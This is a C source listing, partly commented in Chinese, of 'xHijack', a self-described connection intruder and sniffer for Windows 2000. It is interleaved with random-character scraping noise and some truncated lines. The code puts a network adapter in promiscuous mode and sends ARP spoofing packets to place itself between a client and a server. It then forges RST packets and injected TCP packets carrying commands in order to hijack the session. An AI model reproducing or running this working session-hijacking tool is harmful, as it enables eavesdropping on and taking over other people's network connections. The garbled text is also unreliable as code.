^ temp++; 4 u, h& l! ?( \" t } //choose adapter while((iAdapter <= 0) || (iAdapter > i)) / H+ }$ m7 x3 O2 c7 h5 \. Y: { { printf("\nPlease choose your Adapter:"); 9 x" Z# L5 p! R7 u scanf("%1d", &iAdapter); } 7 G0 {' u1 T3 }7 [ printf("\n"); //---------------------------------------------// //这里调用iphlpapi来取得本地ip_addr和mac_addr % F, H% g+ T; R- O1 [ sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); * ~8 a* b" Y R# J dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); # P- X6 k* W: ]1 d if(dwRet != ERROR_BUFFER_OVERFLOW) " F& [0 c; S1 i; ` { printf("GetAdapterInfo error:%d\n", GetLastError()); ) P: [/ \9 s. N7 T0 s. n- m return 0; } pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); if(!pAdapterInfo) { printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); 7 T ~, C# d$ v5 u return 0; } " N1 S& q" Y! D, c dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_SUCCESS) { $ [* V( u/ Z: l) D5 h printf("GetAdapterInfo error:%d\n", GetLastError()); return 0; } pTmp = pAdapterInfo; 8 K" C* ?0 |1 x' ] while(pTmp) { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) $ h- s1 w) v* q+ |; \2 m+ l7 A$ P1 P { - Y3 }0 d: n/ B4 i6 ?! I/ G' q //found it,get own adapter mac address memcpy(g_szOwnMAC, pTmp->Address, 6); //get ip address + z% E( ~# C6 m& A pIPAddr = &pTmp->IpAddressList; # x7 X) B% R: Q! O! L9 b+ ^6 K while(pIPAddr) , G6 Q: \( ?! c+ J { g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); pIPAddr = pIPAddr->Next; if(g_TotalIP >= Max_Num_IPAddr) break; $ k, J" `; S) w% W8 N } 6 [4 E$ t, Q; k; o* \# { break; $ \( x0 M. i' z# _/ ~ } 7 K6 K" G& \3 z2 ]2 b# ^ pTmp = pTmp->Next; ) Z0 c2 q2 B1 v2 K } free(pAdapterInfo); //not found,return zero + r! f9 E: W4 u6 Y& Q) x: Z if( (!pTmp) || (!g_TotalIP) ) return 0; //---------------------------------------------// //open adapter 3 m U9 o' }1 k2 { lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) : u3 t3 ]+ G$ W+ ?* H5 y/ C5 Z { iRetCode = GetLastError(); printf("Unable to open the driver, Error Code : %lx\n", iRetCode); return 0; } * {$ w4 @7 s) [! Y // set the network adapter in promiscuous mod 9 i3 ?& ^4 S } if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) . a& _7 u A6 F8 u2 F" Z { % d5 b, D8 }# J! ~4 n& W printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) 6 } ^/ w3 Z; F) o" G! a. P. ]4 w1 G' K { ! M* R; i& ~1 C7 g' o9 r printf("Unable to set ALL_LOCAL mode!\n"); return 0; ! O; h d" G- T# R1 K } 9 U# z: V) o" \7 \/ E- H+ m } 5 i! R- p" [( s# n# y // set a 512K buffer in the driver 8 M7 N M; Y. q0 t; w, c; f9 r if(PacketSetBuff(lpAdapter, 512000) == FALSE) / R$ z& w3 O$ \# p& {. P { printf("Unable to set the kernel buffer!\n"); return 0; } 5 E2 |; S6 B$ j M // set a 1 second read timeout 2 k# S {; X& e$ H# O. |5 M( Z8 q if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) * s3 w. w7 [( a9 A) R printf("Warning: unable to set the read tiemout!\n"); 9 ^% V! D/ {4 r4 t- E+ B if(PacketSetNumWrites(lpAdapter, 1) == FALSE) 9 E% K, ~9 T4 z6 f# |- o8 s printf("warning: Unable to send more than one packet in a single write!\n"); //设置发送的packet g_lpSendPacket = PacketAllocatePacket(); if(g_lpSendPacket == NULL) ) e w7 d9 _& P9 f0 J6 j) u { printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); return 0; 0 a2 X+ w: J. w4 T* {) R' c } 8 m" W+ l# q/ Z2 G0 k ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); t3 B! I8 u& @2 c; ?+ ]. d8 i return lpAdapter; 1 M' i" c2 i3 O} # n6 z5 c4 q/ ] D, s, Z I) m+ P //功能：帮助信息 void usage() { : H$ z2 ]9 `& ^ printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" "By eyas 2002/8/19\n" "http://www.ey4s.org\n" 4 Y) u5 i9 ]$ l "Thanks to Refd0m and shotgun\n\n" "Usage: xHijack ServerSide ClientSide\n\n"); } // 7 x9 R8 a, I3 w$ P% r//功能：显示数据包的一些详细信息 2 ]. a/ Y9 p+ v$ M. o M// VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) & `- H1 g. x- v{ ; \; h' h( M2 Q0 L# E; R SOCKADDR_IN saDest, saSrc; - N! a% s1 E9 W* Y unsigned char FlagMask; , G, u8 ~2 l: d. H8 ^7 Q0 t int i; saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); 6 n' u; Y- L' X$ f) f3 q5 S" P6 n printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), ; c& b( C- j4 F! x3 Y* f6 Q ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); //display TCP flag # Z. o- P( j7 w. I, q for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) 6 w6 n0 O2 ^2 O- c( }) ~9 x' D { if((pTCPPacket->tcphdr.th_flag) & FlagMask) printf("%c", g_szTcpFlag); ) T0 Y. S% R0 E) b7 v% A- j else printf("-"); } printf("\n"); : T/ `) Y1 l( n1 X9 D0 D- R# L. \ //如有需要，可显示更多详细的信息 4 I% d- a6 v% \" _2 @+ u if(bDetail) : I- I& o+ }7 K& m H printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); 1 u2 [0 ~- D5 q0 u0 @9 O} 6 S7 K! n2 ~, q // ! c( A! H: Q& ]( N& W//功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 . X$ W7 @4 w4 O5 J% K8 C; o// DWORD WINAPI AnalysePacketsThread(LPVOID lp) ( N* b: X+ G9 n& m% o; g2 Z9 ]* B{ . I' H3 D. l( h5 J7 _" G ULONG ulBytesReceived; USHORT usDataLen; //USHORT usIPHeadLen, usTCPHeadLen; char *buf; + H! {, b# u- \ g9 d4 ^! g u_int off, i; PTCPPACKET pTCPPacket; struct bpf_hdr *hdr; LPPACKET lpRecvPacket; 4 r- c( q, u( L+ x4 ?. M m8 f- q char szPacketBuf[256000], *pStr; ' h3 T5 r8 \7 C* x BOOL bDeleteNode, bAddNew; & Y4 B3 k6 B+ U+ M DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 BOOL bClientToServer;//数据包是否从客户端发送到服务器端 7 m) B/ M& C' _5 x7 v, a4 L //设置接收的packet lpRecvPacket = PacketAllocatePacket(); 6 N6 B8 @6 q/ L( V9 i7 D if(lpRecvPacket == NULL) ) v1 L/ g- J0 C$ K. L* n1 ^, Q { / c# }, n6 x1 ` printf("Error:failed to allocate the LPPACKET structure for recv.\n"); return 0; } 6 x* o6 r- x4 e E1 s ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); 0 u9 O% P! {: i PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); while(1) " s L* ~0 ~2 ^5 ` { // capture the packets if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) { printf("Error: PacketReceivePacket failed.\n"); ) d* j" U) Z# \2 u" {5 S* X6 A break; . d" O; {* J* e' Z } ulBytesReceived = lpRecvPacket->ulBytesReceived; buf = lpRecvPacket->Buffer; off = 0; while(off < ulBytesReceived) { ! p$ `% a- C/ m6 C& [4 x9 \ hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); off = Packet_WORDALIGN(off + hdr->bh_caplen); ; T( k" ?, C& P r3 X$ g) {9 n //不需要处理自己发出的包(转发或本机发送的) 6 l9 w' @# ^, T! ?' e0 G if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; / x2 [. y/ Z4 t' E# ?; M, q //检查是否IP包 if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; //检查是否TCP包 if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; * j7 o+ z7 K# P& [4 z //也不处理DestIP是自己的包 for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
            ResetActionAllFlag();
: F3 u+ E: b( ?& N7 J          }
          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
          {
            //send rst packet to client
            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
3 x, G! r/ F* ~* e; n& z4 T+ e( s5 y            //send hijack packet to client
1 G+ \0 }" a3 r0 N+ c$ G$ l            SendHiJackPacket(pTCPPacket);
            //reset action flag
            ResetActionAllFlag();
          }
        }
7 l) l1 r" A; B. |        //show the tcp data
& n4 I' E$ ~( f4 }5 R! Q        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
( m" r- e) @; Y) Z" }/ x0 b" ~        {
% g% U& q' ^( Z, x$ L; i% C/ Y- L5 C          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //暂不考虑IP、TCP头不是20字节的情况
          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
' f& J5 V+ c4 A" @' H. t% S8 {1 `          pStr = (char *)pTCPPacket + 54;
          for(i=0; i        }
      }
) H9 ]8 g$ S0 A4 j3 q/ ?$ u      //debug output
      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
1 U- _- w$ @8 V6 {) y" p5 i% P    }//end of analyse packets while
  }//end of recv packets while
. @) R0 {4 y7 ?* F) J$ W- n  PacketFreePacket(lpRecvPacket);
  return 0;
! _& Z, I* d  [* J( K}
! c% P# ?1 d$ t

//
//功能：操作记录所有连接信息的单向链表
//
DWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
! {: _. g' z" h% t+ y9 _7 K            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
- j) ]- f9 F5 Z9 Y0 A$ _5 y# {. `" U' T{
  PCONNINFO  pNew, pTmp;

5 s9 s" g# C! |, y. E; d  pTmp = g_pConnHead;
' n2 F9 p) A, u  while(pTmp)
# W& p: D: |/ _; Y7 v  {
    if(pTmp-&gt;bActive)
3 k2 w' t) B* H5 b! L    {
" Q4 ~- b# K" u      //found it
/ r. q8 A. ^( E% d/ T      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
  ~- \% y6 C& E        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
, U( O. F- N9 P9 u        (pTmp-&gt;uClientPort == uClientPort) )
, C  I* `: t0 a( r      {
7 ]4 J) W2 a: i1 b0 }3 Q        if(bDelete)
) O+ U% r5 ?% M# w        {
          pTmp-&gt;bActive = FALSE;
          return 0;
        }
; o* C7 I1 \  M        else return pTmp-&gt;ident;
      }
# f: y! d* L1 ~    }
$ D* J( ~4 O/ X4 W    pTmp = pTmp-&gt;Next;
4 N* J$ E: V3 p+ J- {  }
  //not found, create new node
2 C6 _4 ]+ e$ L8 U  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
  {
    //search unactive note
& d& g4 H8 c7 Z9 \3 y) O    pTmp = g_pConnHead;
! Z7 |* i/ G' q, k8 [    while(pTmp)
    {
) @7 s7 D' J2 F) J      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
4 V8 f4 y* K- n2 C6 u0 N! [    }
% X2 c* l: O/ p8 ]! @    //found a unactive node
    if(pTmp)
    {
      pTmp-&gt;dwServerIP = dwServerIP;
      pTmp-&gt;uServerPort = uServerPort;
      pTmp-&gt;dwClientIP = dwClientIP;
$ m7 [! m% N  e( x1 ^. i      pTmp-&gt;uClientPort = uClientPort;
$ _% S' e' F. t6 {" a      pTmp-&gt;bActive = TRUE;
% o' e% n8 C+ K" W) z3 [2 O      return pTmp-&gt;ident;
1 N6 @  |& G/ o6 O, Y  ^2 x    }
# B5 l6 A% A! P3 I" b4 ]: U  L, {    //not found,create new node
, @' h4 K, P* N    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
    {
      printf("malloc for link node error:%d\n", GetLastError());
      return 0;
    }
    //fill the struct
    pNew-&gt;bActive = TRUE;
    pNew-&gt;dwServerIP = dwServerIP;
  `5 v" T) H9 N2 y    pNew-&gt;uServerPort = uServerPort;
' [4 ^3 f: c8 o    pNew-&gt;dwClientIP = dwClientIP;
    pNew-&gt;uClientPort = uClientPort;
    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
4 E% W+ _% t- L& I* x5 I' |    //add new node to link
3 _2 z* ~- }* Y    if(!g_pConnHead)
      g_pConnHead = g_pConnLast = pNew;
    else
    {
( R; D& G6 T6 ~' d0 z! B      g_pConnLast-&gt;Next = pNew;
: D' K) m# C1 R: P      g_pConnLast = pNew;
! Z( X" I( o; z+ S& v$ W1 e    }
. X0 `* ~& {0 ~    return pNew-&gt;ident;
; P; _  ?5 Q4 w. S* G  }
  return 0;
9 z2 d( ~! }. j* C! k# H3 u2 F) T}
9 r5 ?. f, \% t; j
//
( l& ]+ h# w4 W$ [/ [; x, P3 {//功能：判断一个数据包是不是只有ACK标志
8 \$ ]6 f& Z% e5 @! @- q- ?1 }//
/ {) d0 H! b( h3 _' V" gBOOL IsACKPacket(unsigned char flag)
6 h7 f$ U/ N( A1 d* l{
  int  i, j=1;
3 h/ f8 J& a& L1 o: S  for(i=0 ; i&lt;4; i++)
3 N+ Q/ g/ m9 q  {
    if(flag &amp; j) return FALSE;
    j &lt;&lt;= 1;
' f7 X! r1 L$ a3 f/ W5 |! w" ]  }
  if(!(flag &amp; 0x10)) return FALSE;//is ack?
  if(flag &amp; 0x20) return FALSE;
5 _. Q  M9 }+ ]3 M  return TRUE;
}

//
//功能：伪装成Client给Server发送数据包
- l7 r% _% J" l* q//
, ]" n, @& s' Z& `* D9 m! {BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
{
. t) l2 M& M/ B; v# }
  char    szBuff[1520];
- m- s: Y4 q$ _+ [% Y; u  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
  BOOL    bRet = FALSE;

  __try
0 P# \) \% }* ?$ i  w  {
2 L+ k0 D; `! ?: F    //
/ y7 m0 x: z. B7 l1 L7 g    if(!g_pCurrCtrlConn) __leave;
7 q" Q- Z7 Y4 M) j5 `; |    //allocate memory for hijack packet
    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pHiJackPacket)
    {
% K; h3 v# s. J! P+ L  S# @      printf("malloc error:%d\n", GetLastError());
& T: X2 p0 V1 t! m7 Y      __leave;
    }
2 o( A. ]; z! x  |3 A  O7 c, Y% G    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
2 d3 c- s9 ]9 `4 t    //-------------- modify the packet ---------------//
    //modify ethernet head
: Y; D3 @2 A% @2 S; J    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    //modify ip head
% n% J4 S  z4 g0 b    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
; k$ Q2 t; U& P    pHiJackPacket-&gt;iphdr.checksum = 0;
    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
, U4 I9 X/ n$ ^. R; g8 O    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
    //modify tcp head
    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
* c1 Y* r, B4 o6 n6 z8 t- J$ K# e$ s( d    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
. c2 |: W) h( X9 l    pHiJackPacket-&gt;tcphdr.th_sum = 0;
, e, {" |! {4 o2 L    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
    //fill tcp psd head
* L; e. c# l5 ?, T5 t    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
, R/ R9 E, g- v: r    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
! N) M, b0 m& f  Q" j    psdhdr.mbz = 0;
- Z# ]% }: x6 \! j5 c    psdhdr.ptcl = IPPROTO_TCP;
0 i8 Z) z& K( i/ ~6 I/ y' v    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
    //calculate tcp checksum     
; C- G* j! Y: \9 \! i% s9 s0 M; {/ u    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
- n5 k4 d& D7 y) R8 f+ a* P    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
# d$ u+ V8 G; a. `    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
    //calculate IP checksum
    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
* Z$ t$ H* D% m8 z8 s6 u    //fill send buffer           
    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
& R& p0 a8 M% d9 ]( a; p# u% h- U2 P  T    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
3 P3 m4 ]1 ^7 T: k9 Q    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
- {# j7 t; j+ C4 o- f. ~    {
      printf("Error sending the hijack packets!\n");
! q. P. R7 G- y1 ?! P& E      __leave;
    }
; V& C+ @8 s0 f# v    else printf("Send hijack packet ok!\n");
    bRet = TRUE;
  }

韩冰

__finally
  {
$ o3 \' N7 t* J: h4 }) Y+ d% e3 e    if(pHiJackPacket) free(pHiJackPacket);
7 r6 ^4 X, a# ^) V  }
$ k- z5 C+ `* C/ _' E) w, ]+ `& ]  return bRet;
}

1 O% d9 K  H; P7 a
& g; U( g$ R0 \//
//功能：伪装成Server给Client发送rst包
//
BOOL SendRstPacket(unsigned int seq, unsigned int ack)
{
) X% v, g: Q9 U- h+ s9 x9 `  char    szBuff[60];
  PSDHDR    psdhdr;
  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;
5 ]2 I3 s! p; I3 k8 g3 t& M
  __try
) Y6 Y& d. U" x  {
6 i1 [0 ]7 j& G! P( n& ?" v  L    //检查当前指向想控制的连接的信息的指针是否为空
    if(!g_pCurrCtrlConn) __leave;
: E, S$ p9 t  o* K% D    //allocate memory for rst packet
    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pTcpPacket)
2 Q4 ?& r. Y4 u8 g& y7 I2 G    {
" K- `  m! [+ y( @  `8 L3 `/ l1 Y      printf("malloc error:%d\n", GetLastError());
      __leave;
( q* K2 e  Q* p2 w& o6 [7 n) U. r1 }% r  ?    }
    //fill ethernet head
# L4 V0 u% o& Z2 f! ?    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
" y2 @9 K4 j3 x" C' w4 A    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
    //fil ip head
3 ~3 n1 d/ p, ]1 ^    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pTcpPacket-&gt;iphdr.tos = 0;
! _. H0 ~0 W$ K/ `' W5 `    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
    pTcpPacket-&gt;iphdr.ident = 1;
    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
( f$ N% L* L; B2 [& T) F7 b    pTcpPacket-&gt;iphdr.ttl = 128;
1 ]3 d; v& Y8 E3 j    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
    pTcpPacket-&gt;iphdr.checksum = 0;
    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
2 h7 p, B- y8 T2 W& F' U# u1 c    //fill tcp head
    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
; |% ]  [- A7 C- k" L. ^    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
4 X# [/ E8 h; ^! z0 U/ Z3 b3 g" i& J    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
( D  a! ]2 n# @5 |, V9 E1 j    pTcpPacket-&gt;tcphdr.th_win = 0;
; P/ X0 F( i2 X/ Z( o  ?$ S    pTcpPacket-&gt;tcphdr.th_urp = 0;
5 V5 p6 q6 J- x( _# Q6 f$ m    pTcpPacket-&gt;tcphdr.th_sum = 0;
# e' m* H7 z6 d    //fill tcp psd head
$ ]: H3 V# h+ v. {" B) P* A5 l    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
: P) h% u$ ~. J    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
- e3 d1 M; J& K4 o    psdhdr.tcpl = htons(sizeof(TCPHDR));
    //calculate tcp checksum     
0 _7 ?# x" L6 r# p5 Y' }    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
) I' J  b# e% @  q: G9 z6 y4 D7 d: @" Z    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
- E- J" I) x0 l    //calculate IP checksum
    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
9 E4 S, q' [0 B    //fill send buffer
9 F* b' _9 O9 n9 C, d    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
9 Z" {5 d7 t3 g! _% N    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
5 `' ~" S, u. A    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
! T9 P+ r( F4 T5 B    {
      printf("Error sending the rst packets!\n");
6 z! j& j# m3 ~6 L9 M- e      __leave;
    }
    else printf("Send RST packet ok!\n");
    bRet = TRUE;
3 o& Y( g0 e6 U. a  }
  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
$ t( w& M, k1 t  }
" D% s9 H7 f' O: y  return bRet;
}

//
( L; ^9 R) H6 P8 u  w//功能：计算校验和
7 G- x7 T+ }: y  a( x8 @9 r4 l//
9 z$ [% L  g7 g1 t# u2 j, i8 |! DUSHORT checksum(USHORT *buffer, int size)
{
" B% `6 J# m# @; h) }$ w unsigned long cksum=0;
while(size &gt;1) {
  R1 `, ?' z: f+ k  cksum+=*buffer++;
$ ^2 J, A. W* q8 z* f$ [$ U  size -=sizeof(USHORT);
1 O- a% y! u3 ^( \! [ }
9 t: D; E( ~6 z; M! A if(size ) {
: m8 J+ T. d8 y3 l" m8 q% ^  `  cksum += *(UCHAR*)buffer;
8 M; S# Z: J' k6 m- e8 z0 Q }
cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
6 y( W9 u0 o% e: s. O cksum += (cksum &gt;&gt;16);
( s  V8 Q+ M& o return (USHORT)(~cksum);
}
1 S6 E/ `+ [( X, b9 X9 V4 q
& t( Q) X$ Z" c! E" L3 E//
( F0 z* f+ v. b* y//功能:实施ARP欺骗
//1 告诉ServerSide,ClientSide的mac是ownmac
) R' L, G! K& _& ~" x, Q- i//2 告诉ClientSide,ServerSide的mac是ownmac
, c9 f# H. s, E- j9 k1 z//
DWORD WINAPI ArpSpoofThread(LPVOID lpType)
/ E' Q7 ?# ^. y- O{
: O; A& f) h7 g5 W" ]! |/ \, T  int  iType = *(int *)lpType;
  ARPPACKET  ArpPacket;
6 I; Y9 [# U/ `7 K4 }4 F6 U  LPPACKET  lpArpPacket;
  char    szArpBuff[60];

# d' h' \& y& u8 }2 {2 {  switch(iType)
) ?. W0 N! V5 B! R  {
( g0 O6 N6 S, M& Y    case 1:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
) d) @6 C5 p7 f: P& e* Z/ Z      ArpPacket.arphdr.DestIP = g_ServerSideIP;
      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
      break;
    case 2:
* x3 j, |/ N0 l, m$ t& |& N/ r      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
" j  S* H8 Z  v3 \6 y      ArpPacket.arphdr.DestIP = g_ClientSideIP;
      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
" u% r* E& f+ X# P3 a      break;
    default:
      return 0;
, a& t5 ^% X# v2 [3 f  }
  //ethernet head
6 z. P0 Y3 X1 _  h& j* Q  Y) F  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
  //arp head
  D* l0 S5 n% q2 M8 P) t0 ?8 r  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
: x8 ^( s5 h* q  I8 p! N  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
  ArpPacket.arphdr.HrdAddrlen = 6;
  ArpPacket.arphdr.ProAddrLen = 4;
  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
$ n& l, ~# b* y+ E4 _7 T  ArpPacket.arphdr.ProType = htons(EPT_IP);
, F) X' o! T- ?& s  ArpPacket.arphdr.op = htons(2);//arp reply
7 H2 @7 {; n2 |$ Q5 B
& M) U( n. U9 r1 l& `  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
7 y& C, o. h9 i  {
    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
    return 0;
  }
. `9 L4 b, D: f2 W, Y8 h  memset(szArpBuff, 0, sizeof(szArpBuff));
& p: s" d- u6 E" p5 N  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
' B4 a+ k$ s' k5 }% ]9 k" E  //send arp packet
  while(1)
  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
    {
0 T) C" B! T/ _6 |4 ~6 \, \      printf("Error sending the arp spoof packets!\n");
      return 0;
    }
% u2 ~+ C: ^) q4 ^6 ~0 M3 f    Sleep(1000);
6 ?) m! s2 y4 j, P  }
2 P& A4 V2 r) @2 K3 O  K  C7 s* n  return 0;
; F1 ^( y% p% m4 ?}

//
( K9 N* H+ p* E" k  j* u//功能：输入IP取得对应的MAC地址
//
4 \" I  o8 V4 O8 I& `! h0 L7 b1 QBOOL GetMACAddr(DWORD DestIP, char *pMAC)
6 I# X" [3 R# m1 x5 x8 u" j) s{
7 ~' O# b' Y. _1 k3 H  DWORD  dwRet;
